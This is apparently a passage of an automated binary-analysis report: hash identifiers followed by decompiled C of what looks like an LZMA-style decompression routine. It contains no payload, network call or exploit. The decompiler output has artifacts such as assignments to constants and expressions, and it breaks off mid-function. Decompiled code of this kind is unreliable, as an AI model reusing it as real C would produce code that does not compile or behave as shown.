                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                                                  • Instruction ID: f8b3e10e58f717f8edde5794a38fefd32bea2d44dd320be9cbeb21c60fb05cda
                                                                  • Opcode Fuzzy Hash: 7058ec301ddcf020a4ef3743dba596c5c9d63b88222812e1714b66bbcd5ffa43
                                                                  • Instruction Fuzzy Hash: F5913270E00229CBDF28DF98C8547ADBBB1FB45305F15816ED816BB281C778AA96DF44
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 98%
                                                                  			E0040667F() {
                                                                  				unsigned short _t532;
                                                                  				signed int _t533;
                                                                  				void _t534;
                                                                  				void* _t535;
                                                                  				signed int _t536;
                                                                  				signed int _t565;
                                                                  				signed int _t568;
                                                                  				signed int _t589;
                                                                  				signed int* _t606;
                                                                  				void* _t613;
                                                                  
                                                                  				L0:
                                                                  				while(1) {
                                                                  					L0:
                                                                  					if( *(_t613 - 0x40) != 0) {
                                                                  						L89:
                                                                  						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
                                                                  						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
                                                                  						L69:
                                                                  						_t606 =  *(_t613 - 0x58);
                                                                  						 *(_t613 - 0x84) = 0x12;
                                                                  						L132:
                                                                  						 *(_t613 - 0x54) = _t606;
                                                                  						L133:
                                                                  						_t532 =  *_t606;
                                                                  						_t589 = _t532 & 0x0000ffff;
                                                                  						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                                  						if( *(_t613 - 0xc) >= _t565) {
                                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                                  							 *(_t613 - 0x40) = 1;
                                                                  							_t533 = _t532 - (_t532 >> 5);
                                                                  							 *_t606 = _t533;
                                                                  						} else {
                                                                  							 *(_t613 - 0x10) = _t565;
                                                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                  							 *_t606 = (0x800 - _t589 >> 5) + _t532;
                                                                  						}
                                                                  						if( *(_t613 - 0x10) >= 0x1000000) {
                                                                  							L139:
                                                                  							_t534 =  *(_t613 - 0x84);
                                                                  							L140:
                                                                  							 *(_t613 - 0x88) = _t534;
                                                                  							goto L1;
                                                                  						} else {
                                                                  							L137:
                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                  								 *(_t613 - 0x88) = 5;
                                                                  								goto L170;
                                                                  							}
                                                                  							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                  							goto L139;
                                                                  						}
                                                                  					} else {
                                                                  						if( *(__ebp - 0x60) == 0) {
                                                                  							L171:
                                                                  							_t536 = _t535 | 0xffffffff;
                                                                  							L172:
                                                                  							return _t536;
                                                                  						}
                                                                  						__eax = 0;
                                                                  						_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                                  						0 | _t258 = _t258 + _t258 + 9;
                                                                  						 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                                  						L75:
                                                                  						if( *(__ebp - 0x64) == 0) {
                                                                  							 *(__ebp - 0x88) = 0x1b;
                                                                  							L170:
                                                                  							_t568 = 0x22;
                                                                  							memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
                                                                  							_t536 = 0;
                                                                  							goto L172;
                                                                  						}
                                                                  						__eax =  *(__ebp - 0x14);
                                                                  						__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  						if(__eax >=  *(__ebp - 0x74)) {
                                                                  							__eax = __eax +  *(__ebp - 0x74);
                                                                  						}
                                                                  						__edx =  *(__ebp - 8);
                                                                  						__cl =  *(__eax + __edx);
                                                                  						__eax =  *(__ebp - 0x14);
                                                                  						 *(__ebp - 0x5c) = __cl;
                                                                  						 *(__eax + __edx) = __cl;
                                                                  						__eax = __eax + 1;
                                                                  						__edx = 0;
                                                                  						_t274 = __eax %  *(__ebp - 0x74);
                                                                  						__eax = __eax /  *(__ebp - 0x74);
                                                                  						__edx = _t274;
                                                                  						__eax =  *(__ebp - 0x68);
                                                                  						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                                  						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                                  						_t283 = __ebp - 0x64;
                                                                  						 *_t283 =  *(__ebp - 0x64) - 1;
                                                                  						 *( *(__ebp - 0x68)) = __cl;
                                                                  						L79:
                                                                  						 *(__ebp - 0x14) = __edx;
                                                                  						L80:
                                                                  						 *(__ebp - 0x88) = 2;
                                                                  					}
                                                                  					L1:
                                                                  					_t535 =  *(_t613 - 0x88);
                                                                  					if(_t535 > 0x1c) {
                                                                  						goto L171;
                                                                  					}
                                                                  					switch( *((intOrPtr*)(_t535 * 4 +  &M00406BD6))) {
                                                                  						case 0:
                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                  								goto L170;
                                                                  							}
                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  							_t535 =  *( *(_t613 - 0x70));
                                                                  							if(_t535 > 0xe1) {
                                                                  								goto L171;
                                                                  							}
                                                                  							_t539 = _t535 & 0x000000ff;
                                                                  							_push(0x2d);
                                                                  							asm("cdq");
                                                                  							_pop(_t570);
                                                                  							_push(9);
                                                                  							_pop(_t571);
                                                                  							_t609 = _t539 / _t570;
                                                                  							_t541 = _t539 % _t570 & 0x000000ff;
                                                                  							asm("cdq");
                                                                  							_t604 = _t541 % _t571 & 0x000000ff;
                                                                  							 *(_t613 - 0x3c) = _t604;
                                                                  							 *(_t613 - 0x1c) = (1 << _t609) - 1;
                                                                  							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
                                                                  							_t612 = (0x300 << _t604 + _t609) + 0x736;
                                                                  							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
                                                                  								L10:
                                                                  								if(_t612 == 0) {
                                                                  									L12:
                                                                  									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
                                                                  									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                                  									goto L15;
                                                                  								} else {
                                                                  									goto L11;
                                                                  								}
                                                                  								do {
                                                                  									L11:
                                                                  									_t612 = _t612 - 1;
                                                                  									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
                                                                  								} while (_t612 != 0);
                                                                  								goto L12;
                                                                  							}
                                                                  							if( *(_t613 - 4) != 0) {
                                                                  								GlobalFree( *(_t613 - 4));
                                                                  							}
                                                                  							_t535 = GlobalAlloc(0x40, 0x600); // executed
                                                                  							 *(_t613 - 4) = _t535;
                                                                  							if(_t535 == 0) {
                                                                  								goto L171;
                                                                  							} else {
                                                                  								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
                                                                  								goto L10;
                                                                  							}
                                                                  						case 1:
                                                                  							L13:
                                                                  							__eflags =  *(_t613 - 0x6c);
                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                  								 *(_t613 - 0x88) = 1;
                                                                  								goto L170;
                                                                  							}
                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                                  							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                                  							_t45 = _t613 - 0x48;
                                                                  							 *_t45 =  *(_t613 - 0x48) + 1;
                                                                  							__eflags =  *_t45;
                                                                  							L15:
                                                                  							if( *(_t613 - 0x48) < 4) {
                                                                  								goto L13;
                                                                  							}
                                                                  							_t547 =  *(_t613 - 0x40);
                                                                  							if(_t547 ==  *(_t613 - 0x74)) {
                                                                  								L20:
                                                                  								 *(_t613 - 0x48) = 5;
                                                                  								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                                  								goto L23;
                                                                  							}
                                                                  							 *(_t613 - 0x74) = _t547;
                                                                  							if( *(_t613 - 8) != 0) {
                                                                  								GlobalFree( *(_t613 - 8));
                                                                  							}
                                                                  							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                                  							 *(_t613 - 8) = _t535;
                                                                  							if(_t535 == 0) {
                                                                  								goto L171;
                                                                  							} else {
                                                                  								goto L20;
                                                                  							}
                                                                  						case 2:
                                                                  							L24:
                                                                  							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                                  							 *(_t613 - 0x84) = 6;
                                                                  							 *(_t613 - 0x4c) = _t554;
                                                                  							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
                                                                  							goto L132;
                                                                  						case 3:
                                                                  							L21:
                                                                  							__eflags =  *(_t613 - 0x6c);
                                                                  							if( *(_t613 - 0x6c) == 0) {
                                                                  								 *(_t613 - 0x88) = 3;
                                                                  								goto L170;
                                                                  							}
                                                                  							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                                  							_t67 = _t613 - 0x70;
                                                                  							 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                                  							__eflags =  *_t67;
                                                                  							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                                  							L23:
                                                                  							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                                  							if( *(_t613 - 0x48) != 0) {
                                                                  								goto L21;
                                                                  							}
                                                                  							goto L24;
                                                                  						case 4:
                                                                  							goto L133;
                                                                  						case 5:
                                                                  							goto L137;
                                                                  						case 6:
                                                                  							__edx = 0;
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__eax =  *(__ebp - 4);
                                                                  								__ecx =  *(__ebp - 0x38);
                                                                  								 *(__ebp - 0x34) = 1;
                                                                  								 *(__ebp - 0x84) = 7;
                                                                  								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                                  								goto L132;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                                  							__esi =  *(__ebp - 0x60);
                                                                  							__cl = 8;
                                                                  							__cl = 8 -  *(__ebp - 0x3c);
                                                                  							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                                  							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                                  							__ecx =  *(__ebp - 0x3c);
                                                                  							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                                  							__ecx =  *(__ebp - 4);
                                                                  							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                                  							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                                  							__eflags =  *(__ebp - 0x38) - 4;
                                                                  							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                                  							if( *(__ebp - 0x38) >= 4) {
                                                                  								__eflags =  *(__ebp - 0x38) - 0xa;
                                                                  								if( *(__ebp - 0x38) >= 0xa) {
                                                                  									_t98 = __ebp - 0x38;
                                                                  									 *_t98 =  *(__ebp - 0x38) - 6;
                                                                  									__eflags =  *_t98;
                                                                  								} else {
                                                                  									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                                  								}
                                                                  							} else {
                                                                  								 *(__ebp - 0x38) = 0;
                                                                  							}
                                                                  							__eflags =  *(__ebp - 0x34) - __edx;
                                                                  							if( *(__ebp - 0x34) == __edx) {
                                                                  								__ebx = 0;
                                                                  								__ebx = 1;
                                                                  								goto L61;
                                                                  							} else {
                                                                  								__eax =  *(__ebp - 0x14);
                                                                  								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                                  								__eflags = __eax -  *(__ebp - 0x74);
                                                                  								if(__eax >=  *(__ebp - 0x74)) {
                                                                  									__eax = __eax +  *(__ebp - 0x74);
                                                                  									__eflags = __eax;
                                                                  								}
                                                                  								__ecx =  *(__ebp - 8);
                                                                  								__ebx = 0;
                                                                  								__ebx = 1;
                                                                  								__al =  *((intOrPtr*)(__eax + __ecx));
                                                                  								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                                  								goto L41;
                                                                  							}
                                                                  						case 7:
                                                                  							__eflags =  *(__ebp - 0x40) - 1;
                                                                  							if( *(__ebp - 0x40) != 1) {
                                                                  								__eax =  *(__ebp - 0x24);
                                                                  								 *(__ebp - 0x80) = 0x16;
                                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  								__eax =  *(__ebp - 0x28);
                                                                  								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  								__eax =  *(__ebp - 0x2c);
                                                                  								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  								__eax = 0;
                                                                  								__eflags =  *(__ebp - 0x38) - 7;
                                                                  								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                                  								__al = __al & 0x000000fd;
                                                                  								__eax = (__eflags >= 0) - 1 + 0xa;
                                                                  								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                                  								__eax =  *(__ebp - 4);
                                                                  								__eax =  *(__ebp - 4) + 0x664;
                                                                  								__eflags = __eax;
                                                                  								 *(__ebp - 0x58) = __eax;
                                                                  								goto L69;
                                                                  							}
                                                                  							__eax =  *(__ebp - 4);
                                                                  							__ecx =  *(__ebp - 0x38);
                                                                  							 *(__ebp - 0x84) = 8;
                                                                  							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                                  							goto L132;
                                                                  						case 8:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__eax =  *(__ebp - 4);
                                                                  								__ecx =  *(__ebp - 0x38);
                                                                  								 *(__ebp - 0x84) = 0xa;
                                                                  								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                                                                  							} else {
                                                                  								__eax =  *(__ebp - 0x38);
                                                                  								__ecx =  *(__ebp - 4);
                                                                  								__eax =  *(__ebp - 0x38) + 0xf;
                                                                  								 *(__ebp - 0x84) = 9;
                                                                  								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                                                                  								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                                                                  							}
                                                                  							goto L132;
                                                                  						case 9:
                                                                  							goto L0;
                                                                  						case 0xa:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__eax =  *(__ebp - 4);
                                                                  								__ecx =  *(__ebp - 0x38);
                                                                  								 *(__ebp - 0x84) = 0xb;
                                                                  								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                                  								goto L132;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x28);
                                                                  							goto L88;
                                                                  						case 0xb:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__ecx =  *(__ebp - 0x24);
                                                                  								__eax =  *(__ebp - 0x20);
                                                                  								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                                  							} else {
                                                                  								__eax =  *(__ebp - 0x24);
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x28);
                                                                  							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                                  							L88:
                                                                  							__ecx =  *(__ebp - 0x2c);
                                                                  							 *(__ebp - 0x2c) = __eax;
                                                                  							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                                  							goto L89;
                                                                  						case 0xc:
                                                                  							L99:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0xc;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t334 = __ebp - 0x70;
                                                                  							 *_t334 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t334;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							__eax =  *(__ebp - 0x2c);
                                                                  							goto L101;
                                                                  						case 0xd:
                                                                  							L37:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0xd;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t122 = __ebp - 0x70;
                                                                  							 *_t122 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t122;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							L39:
                                                                  							__eax =  *(__ebp - 0x40);
                                                                  							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                                  								goto L48;
                                                                  							}
                                                                  							__eflags = __ebx - 0x100;
                                                                  							if(__ebx >= 0x100) {
                                                                  								goto L54;
                                                                  							}
                                                                  							L41:
                                                                  							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                                  							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                                  							__ecx =  *(__ebp - 0x58);
                                                                  							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                                  							 *(__ebp - 0x48) = __eax;
                                                                  							__eax = __eax + 1;
                                                                  							__eax = __eax << 8;
                                                                  							__eax = __eax + __ebx;
                                                                  							__esi =  *(__ebp - 0x58) + __eax * 2;
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                                  							__ax =  *__esi;
                                                                  							 *(__ebp - 0x54) = __esi;
                                                                  							__edx = __ax & 0x0000ffff;
                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  								__cx = __ax;
                                                                  								 *(__ebp - 0x40) = 1;
                                                                  								__cx = __ax >> 5;
                                                                  								__eflags = __eax;
                                                                  								__ebx = __ebx + __ebx + 1;
                                                                  								 *__esi = __ax;
                                                                  							} else {
                                                                  								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                  								0x800 = 0x800 - __edx;
                                                                  								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                                  								__ebx = __ebx + __ebx;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  								goto L39;
                                                                  							} else {
                                                                  								goto L37;
                                                                  							}
                                                                  						case 0xe:
                                                                  							L46:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0xe;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t156 = __ebp - 0x70;
                                                                  							 *_t156 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t156;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							while(1) {
                                                                  								L48:
                                                                  								__eflags = __ebx - 0x100;
                                                                  								if(__ebx >= 0x100) {
                                                                  									break;
                                                                  								}
                                                                  								__eax =  *(__ebp - 0x58);
                                                                  								__edx = __ebx + __ebx;
                                                                  								__ecx =  *(__ebp - 0x10);
                                                                  								__esi = __edx + __eax;
                                                                  								__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  								__ax =  *__esi;
                                                                  								 *(__ebp - 0x54) = __esi;
                                                                  								__edi = __ax & 0x0000ffff;
                                                                  								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  								__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  								if( *(__ebp - 0xc) >= __ecx) {
                                                                  									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  									__cx = __ax;
                                                                  									_t170 = __edx + 1; // 0x1
                                                                  									__ebx = _t170;
                                                                  									__cx = __ax >> 5;
                                                                  									__eflags = __eax;
                                                                  									 *__esi = __ax;
                                                                  								} else {
                                                                  									 *(__ebp - 0x10) = __ecx;
                                                                  									0x800 = 0x800 - __edi;
                                                                  									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  									__ebx = __ebx + __ebx;
                                                                  									 *__esi = __cx;
                                                                  								}
                                                                  								__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  								 *(__ebp - 0x44) = __ebx;
                                                                  								if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  									continue;
                                                                  								} else {
                                                                  									goto L46;
                                                                  								}
                                                                  							}
                                                                  							L54:
                                                                  							_t173 = __ebp - 0x34;
                                                                  							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                                  							__eflags =  *_t173;
                                                                  							goto L55;
                                                                  						case 0xf:
                                                                  							L58:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0xf;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t203 = __ebp - 0x70;
                                                                  							 *_t203 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t203;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							L60:
                                                                  							__eflags = __ebx - 0x100;
                                                                  							if(__ebx >= 0x100) {
                                                                  								L55:
                                                                  								__al =  *(__ebp - 0x44);
                                                                  								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                                  								goto L56;
                                                                  							}
                                                                  							L61:
                                                                  							__eax =  *(__ebp - 0x58);
                                                                  							__edx = __ebx + __ebx;
                                                                  							__ecx =  *(__ebp - 0x10);
                                                                  							__esi = __edx + __eax;
                                                                  							__ecx =  *(__ebp - 0x10) >> 0xb;
                                                                  							__ax =  *__esi;
                                                                  							 *(__ebp - 0x54) = __esi;
                                                                  							__edi = __ax & 0x0000ffff;
                                                                  							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                                  							__eflags =  *(__ebp - 0xc) - __ecx;
                                                                  							if( *(__ebp - 0xc) >= __ecx) {
                                                                  								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                                  								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                                  								__cx = __ax;
                                                                  								_t217 = __edx + 1; // 0x1
                                                                  								__ebx = _t217;
                                                                  								__cx = __ax >> 5;
                                                                  								__eflags = __eax;
                                                                  								 *__esi = __ax;
                                                                  							} else {
                                                                  								 *(__ebp - 0x10) = __ecx;
                                                                  								0x800 = 0x800 - __edi;
                                                                  								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                                  								__ebx = __ebx + __ebx;
                                                                  								 *__esi = __cx;
                                                                  							}
                                                                  							__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                                  							 *(__ebp - 0x44) = __ebx;
                                                                  							if( *(__ebp - 0x10) >= 0x1000000) {
                                                                  								goto L60;
                                                                  							} else {
                                                                  								goto L58;
                                                                  							}
                                                                  						case 0x10:
                                                                  							L109:
                                                                  							__eflags =  *(__ebp - 0x6c);
                                                                  							if( *(__ebp - 0x6c) == 0) {
                                                                  								 *(__ebp - 0x88) = 0x10;
                                                                  								goto L170;
                                                                  							}
                                                                  							__ecx =  *(__ebp - 0x70);
                                                                  							__eax =  *(__ebp - 0xc);
                                                                  							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                                  							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                                  							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							_t365 = __ebp - 0x70;
                                                                  							 *_t365 =  *(__ebp - 0x70) + 1;
                                                                  							__eflags =  *_t365;
                                                                  							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                                  							goto L111;
                                                                  						case 0x11:
                                                                  							goto L69;
                                                                  						case 0x12:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								__eax =  *(__ebp - 0x58);
                                                                  								 *(__ebp - 0x84) = 0x13;
                                                                  								__esi =  *(__ebp - 0x58) + 2;
                                                                  								goto L132;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x4c);
                                                                  							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                                  							__ecx =  *(__ebp - 0x58);
                                                                  							__eax =  *(__ebp - 0x4c) << 4;
                                                                  							__eflags = __eax;
                                                                  							__eax =  *(__ebp - 0x58) + __eax + 4;
                                                                  							goto L130;
                                                                  						case 0x13:
                                                                  							__eflags =  *(__ebp - 0x40);
                                                                  							if( *(__ebp - 0x40) != 0) {
                                                                  								_t469 = __ebp - 0x58;
                                                                  								 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                                  								__eflags =  *_t469;
                                                                  								 *(__ebp - 0x30) = 0x10;
                                                                  								 *(__ebp - 0x40) = 8;
                                                                  								L144:
                                                                  								 *(__ebp - 0x7c) = 0x14;
                                                                  								goto L145;
                                                                  							}
                                                                  							__eax =  *(__ebp - 0x4c);
